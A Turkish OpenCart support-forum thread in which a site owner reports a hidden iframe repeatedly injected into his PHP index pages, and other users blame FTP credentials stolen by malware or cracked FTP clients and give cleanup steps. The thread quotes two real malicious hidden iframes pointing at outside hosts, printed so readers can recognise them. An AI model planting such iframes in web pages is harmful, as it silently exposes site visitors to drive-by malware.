<iframe> Bilinmeyen Kodlar..

XxKaBuS

OpenCart-TR
Katılım
15 Ağu 2009
Mesajlar
23
Tepkime puanı
0
Puanları
0
Dostum bu iframe kodlarından nasıl kurtulabiliriz. siteyi devamlı bozuyor ve neredeyse sabit 8 php dosyasına kendi kendine kod yerleşiyor ve site bozuk görünüyor. nette aradım kurtulmanın yolunu buldum ancak nettekiler olmadı senin bi fikrin varmı? şimdiden teşekkürler
 

admin

Administrator
Yönetici
Katılım
13 Ağu 2009
Mesajlar
3,208
Tepkime puanı
1
Puanları
38
Yaş
36
Konum
Bursa
Web sitesi
www.opencart-tr.com
a12a12' Alıntı:
Dostum bu iframe kodlarından nasıl kurtulabiliriz. siteyi devamlı bozuyor ve neredeyse sabit 8 php dosyasına kendi kendine kod yerleşiyor ve site bozuk görünüyor. nette aradım kurtulmanın yolunu buldum ancak nettekiler olmadı senin bi fikrin varmı? şimdiden teşekkürler
Tam olarak anlatmak istediğini kavrayamadım. iframe kodlarını nereye nasıl ekliyorsun. Biraz daha ayrıntı verebilir misin.
 

XxKaBuS

OpenCart-TR
Katılım
15 Ağu 2009
Mesajlar
23
Tepkime puanı
0
Puanları
0
<iframe src="http://3e0.ru:8080/index.php" width=181 height=168 style="visibility: hidden"></iframe>

Mesela bu kod benim index.php ve home.php dosyalarının en altına yerleşiyor. nedendir bilemedim ama bi türlü beceremedim bunun düzelmesini. siliyorum tekrar ftp ye atıyorum düzeliyor ama ertesi gün yine aynı bunun çaresini bulma imkanımız varmı.. bunu demek istemiştim...
 

admin

Administrator
Yönetici
Katılım
13 Ağu 2009
Mesajlar
3,208
Tepkime puanı
1
Puanları
38
Yaş
36
Konum
Bursa
Web sitesi
www.opencart-tr.com
a12a12' Alıntı:
<iframe src="http://3e0.ru:8080/index.php" width=181 height=168 style="visibility: hidden"></iframe>

Mesela bu kod benim index.php ve home.php dosyalarının en altına yerleşiyor. nedendir bilemedim ama bi türlü beceremedim bunun düzelmesini. siliyorum tekrar ftp ye atıyorum düzeliyor ama ertesi gün yine aynı bunun çaresini bulma imkanımız varmı.. bunu demek istemiştim...
Bunun OpenCart ya da iframe ile alakalı değil. iframe ile olsa benim kurduğum demo adresde hepsiburada nın reklamı var. Oda iframe kod kullanıyor. Ftp şifreni başkaları öğrenmiş ya da senin pc de virüs var. Bilgisayarını güzel bir antivirus programı ile tarat ya da format at. ftp admin panel şifrelerini değiştirip herşeyi sıfırdan tekrar kur.
 

webalani

OpenCart-TR
Katılım
20 Ağu 2009
Mesajlar
1
Tepkime puanı
0
Puanları
0
ftp şifresi başkalarının eline geçmiş. Sen ne kadar temizlersen temizle iframe kodu default index tarzı sayfalara sürekli bulaşacaktır. bunu programlarla yapıyorlar.
Ne yapman gerek:
Ftp şifreni değiştir. kullandığın ftp programları - cuteftp kırık olarak kullanıyorsan kırarken kendisi bir kod atıyor ve eklediğin sitelere otomatik olarak iframkodu atıyor ftp şifreni başkalarına gönderiyor. bu şekilde ftp programlarına dikkat et. filezilla tarzı açık kaynak kullanabilirsin.
Arkadaşın dediği gibi bilgisayarını tarat. :) yada formatla :))
 

XxKaBuS

OpenCart-TR
Katılım
15 Ağu 2009
Mesajlar
23
Tepkime puanı
0
Puanları
0
webalani' Alıntı:
ftp şifresi başkalarının eline geçmiş. Sen ne kadar temizlersen temizle iframe kodu default index tarzı sayfalara sürekli bulaşacaktır. bunu programlarla yapıyorlar.
Ne yapman gerek:
Ftp şifreni değiştir. kullandığın ftp programları - cuteftp kırık olarak kullanıyorsan kırarken kendisi bir kod atıyor ve eklediğin sitelere otomatik olarak iframkodu atıyor ftp şifreni başkalarına gönderiyor. bu şekilde ftp programlarına dikkat et. filezilla tarzı açık kaynak kullanabilirsin.
Arkadaşın dediği gibi bilgisayarını tarat. :) yada formatla :))

Sağolasın Dostum.. Allataki Makaleyi Okuyabilirsin Sendede Öyle Bi Durum Varsa...
Yeni çıkan Ve Tehlike Arz Eden Bir Virus

Son zamanlarda büyük hızla yolunda yüreyen yeni virüs bir çok webmasterin sorunu oldu ve olmayada devam ediyor..
Bu virüs bir kere bilgisayarınıza bulaştıkdan sonra o bilgisayarla hangi sitenin ftp'ini açarsanız açın girdiğiniz
ftp bilgilerini kaydederek, sitelere girip index.php , index.html , index.htm , default.asp 'in içlerine iframe kodu atiyor
atılan iframe kodu şu şekildedir..

CODE
<iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0
FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Ve Sadece www/public htm/ dizinine değil diğer bütün klasörülerin içinde bulunan index.php , index.html , index.htm ,
default.asp 'in içinede atıyor..
Şimdiye kadar bir çok başlık gördüm bu şekilde bu virüslerden yakınan o yüzden bu yazıyı yazma gereği duydum...

Virüs size nasıl bulaşır ?

başka kişinin sitesine bulaşmışsa ve sizde o siteye girdiyseniz üstelik hiç bir antivirüs yüklü değilse bilgisayarınıza;
Bilinki o virüs artık sizinde bilgisayarınızda ve girdiğiniz bütün ftp'lere girmeye başlayacaktır..

Peki Virüs Sizin Bilgisayarınıza Bulaştı ve bunun farkına vardınız ne yapmamız gerekir ?

Sadece ftp bilgilerinizi alabildiği için hemen dosyalarınızı pc'ye atıp içindeki iframe kodlarını silin ve tekrar ftp'den
upload edin. Sonra hiç vakit kaybetmeden cpanel/plesk panelinize girin ve şifrenizi değiştirin.
Bu işlemleri yaptıktan sonra sakın ftp'den giriş yapmayın. Çünkü ftp'den giriş yaptığınızda değiştirdiğiniz şifreyide
alarak tekrar dosyalarıza iframe atmaya başlayacaktır.. Bu işlemleride yaptıktan sonra bilgisayarıza format atin..

Virüs Bana bulaşmadı Nasıl korunabilirim ?

Filezilla veya cuteftp kullanarak serverinize bağlanın, index.php ,index.htm, index.html, default.asp Bütün klasörlerdeki
bu saydığım uzantılı sayfalarınızın chmod değerlerini 444 yapın. Bilgisayarınıza Nod32, Panda veya Kaspersky kurun
( ben Kaspersky kullanıyorum ve çoğu sitede virüs yakaladı ama bana bulaşmadı) Bilgisayarınızı güvene alın.
Her ftpye girdikten sonra direk cpanelden yada plesk paneden girerek ftp şifrenizi değiştirin.
Birde bilgisayarınıza Ad-Aware SE Personal 'i kurun iki günde bir tarama yaptırın.

Herhangi bir web sayfanızdan virüs önce bilgisayarınıza sızıyor ve daha sonra
FTP benzeri program ile sitenize bulaşıyor. Haliyle bu şekilde her yere yayılmaya başlıyor.
virüs bi süre sonra masaüstünüze update.exe diye bi virüs ekleyip pc'ye zarar vermeye başlıyormuş.

Çözüm için ne yapabiliriz?
Öncelikle ilgisayarınızda dosya bulma menüsünden cd Win.Agent.pz(ntos.exe) bulduğunuzda
hemen silin. Daha sonra antitrojan ve antivirüsler ile bilgisayarınızı tarayın.
Bu işlemlerden sonra FTP'yi kullanıp dosyaları kontrol edin.

Diğer bir alternatif olarak;
Sitenizde bulunan dosyaları FTP yoluyla bilgisayarınıza indirip belirtilen
iframe kodlarının olup olmadığını kontrol kontrol ederek virüs taramasından geçirin.
Güvende olduğunuzu hissediyorsanız Daha sonra dosyaları FTP'den tekrar sitenize atın.
Yada Cute FTP kullanıyorsanız Ctrl-F kısayılu ile arama menüsünü açarak
sitenizte 81.95.145.240 ip numarasını arayın.

işlem sonucu dosyaların cmod ayarlarını kontrol ederek ilgili dosyaların ayarlarını 444 yapın.

Ayrıca tarayıcı olarak Firefox kullanmanın bu tip saldırıları önleyeceğini düşünüyorum.

Iframe Virus Kurtulma Yolları Son günlerde yaygınlaşan iframe virusten kurtulma yollarını açıklayacağım.

Iframe virus nedir?
Bilgisayarınıza bulaşan ve sitelerinizin index.htm, index.php gibi sayfalarının en altına iframe kodu ko***** etrafa virus yayan sistemdir.
Kurtulma Yolları

1-) Virus taraması yapın. Kaspersky kullanmanızı öneririm. Sonrasında bilgisayarınızda “agent” diye aratın ve bulunan dosyaları taratın. Bilgisayarı temizledikten sonra güvenli bir şekilde FTP’nize girin ve viruslu klasörleri yada dosyaları indirin ve kodu temizleyin tekrar upload edin. Sonra FTP şifrelerinizi değiştirin. Kaspersky ile taratmanızı öneriyorum. Öncelikle windows/temp klasöründen başlayın taratmaya.

2-) 1′in devamında FTP’deki klasörlerinizi iznini “755″ yapın. (chmode 755). Dosyaların iznini de “444″ yapın. Bu dışarıdan yazılmasını engelleyecektir. Bunun sayesinde virusu yayan sistem FTP’nizdeki dosya/klasörleri düzenleyemeyecektir (editleyemeyecektir).

3-) Arama bölümünden “agent”, “key”, “.exe” gibi aratmalarla bulduğunuz klasörleri iyice taratın. “Spyware Doctor” adlı programı da kurun ve çalıştırmaya başlayın. Sonra klasör/dosyalarınızı temizleyin ve tekrar atın.

4-) Üstteki 3 yöntem de işe yaramazsa sitenizin yedeğini alın (temizce). Güzelce bir format atın ve tekrar yükleyin. “Script Blocker” programları yükleyin ve taratıcınıza entegre edin (zaten onlar kendi olacaktır.) Bu sayede bu tarz script ve kodlar engellenmiş olacaktır.

“Kaspersky + Spyware Doctor + Script Blocker” bu 3′lü kurulu olduğunda bu tarz virüslerin bulaşma ihtimali çok düşüktür.
 

M.Fidan

OpenCart-TR
Katılım
6 Eki 2009
Mesajlar
33
Tepkime puanı
0
Puanları
0
Evet benimde başıma geldi. :x dediğin gibi yapacam inş. eski haline döner
 

efekabaraci

OpenCart-TR
Katılım
20 Eki 2009
Mesajlar
5
Tepkime puanı
0
Puanları
0
yukarıda arkadaşımız çok güzel açıklamış allah razı olsun ayrıca bir bilgide ben eklemek istiyorum genelde Cute FTP ile bulaşıyor Cute FTP c.r.a.c.k yada patchlerinden kaynaklanıyor benimde başıma gelmişti. tüm hostu sildirmem ve ftp şifreleri değiştirip yeniden aktarımla kurtuldum. orjinal alma gücünüz varsa orjinal alın yoksa eğe filezilla ile devam

saygılarımla
 

admin

Administrator
Yönetici
Katılım
13 Ağu 2009
Mesajlar
3,208
Tepkime puanı
1
Puanları
38
Yaş
36
Konum
Bursa
Web sitesi
www.opencart-tr.com
Evet bu gibi şeyler de mümkünse orjinalini satın almak en iyisi ya da ücretsiz dağıtılan yazılımlar kullanmak. Filezilla da bunun hakkını fazlasıyla veriyor. Bu yüzden crackli programlar kullanmanın bir anlamı yok. :!:
 

GHOST_01

OpenCart-TR
Katılım
26 Ocak 2010
Mesajlar
7
Tepkime puanı
0
Puanları
0
a12a12 negüzel anlatmış bak dostum yapacağın şey belli önce pc'ne bi format at ya da virüs tara temizle emin ol virüs girmiştir.. sora ftp prgramı kullanıyosan sil onu ftp şifreni deiştir sonra o deiştirdiği dosyaları pc ne indir frame kodlarını sil tekrar uplaod et ve yazma izinlerini(chmod)755 yap sorun kalmıcaktır..
 

Systembox

OpenCart-TR
Katılım
18 Şub 2010
Mesajlar
24
Tepkime puanı
0
Puanları
0
iyide arkadaşlar pc ye format atması problemi ortadan kaldırmaz. neden derseniz zaten bu <iframe kodları serverin /temp klasörünün içinede bulaşmıştır. ne kadar uğraşırsan uğraş chmod kodlarını kapatmadan yine bulaşacaktır. makinana format atmam tabiki iyi senin o iframe ile yediğin bir trojendownloader ve durmadan makinana virus çekiyor. yapman gereken güzel bir format ve ftp kullanıcı hesabini silip baştan açman ve yazma izinlerinide açık unutma. zaten iframe kodunun mantiği anasayfalara yani index < default < home .asp php html artık her neyse kodlama dili onlara bulaşmasıdır.
 
Üst